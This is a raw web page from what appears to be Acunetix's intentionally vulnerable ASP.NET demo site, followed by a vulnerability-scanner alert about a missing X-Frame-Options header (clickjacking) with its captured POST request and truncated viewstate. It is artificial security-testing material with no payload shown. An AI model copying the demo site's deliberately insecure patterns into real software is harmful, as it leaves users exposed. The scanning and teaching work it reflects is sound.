iIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WBB4EVGV4dAUSUmVhZCB1c2VyIGNvbW1lbnRzHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0wZGQCCw8WAh4Dc3JjZGRkfC/V3VUyYDVyDam3PHmHmEHBfQA=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKZgbWNCQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q+Ak/h9oIkGZGh4+qj2I+T7ihtiWg==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> – <strong>May 2019</strong> – Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p> <p>“No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,” said Nicolas Sciberras, CTO.</p> <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p> <p><strong>More Features in the Latest Build</strong></p> <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p> <p>- Support for IPv6<br /> - Improved usage of machine resources<br /> - Added support for Selenium scripts as import files<br /> - Multiple vulnerability checks for SAP<br /> - Unauthorized access detection for Redis and Memcached<br /> - Source code disclosure for Ruby and Python</p> <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p> <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p> <p><strong>Acunetix, the Company</strong></p> <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Parameter X-Frame-OptionsSolution Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY. Alternatively consider implementing Content Security Policy's "frame-ancestors" directive.
POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=2
Alert tags Alert description X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.
Request Request line and header section (414 bytes)
POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=2 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=2 Content-Length: 10975 Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232Request body (10975 bytes)
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc%2BQWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BNTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BRmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BJnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc%2BPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAg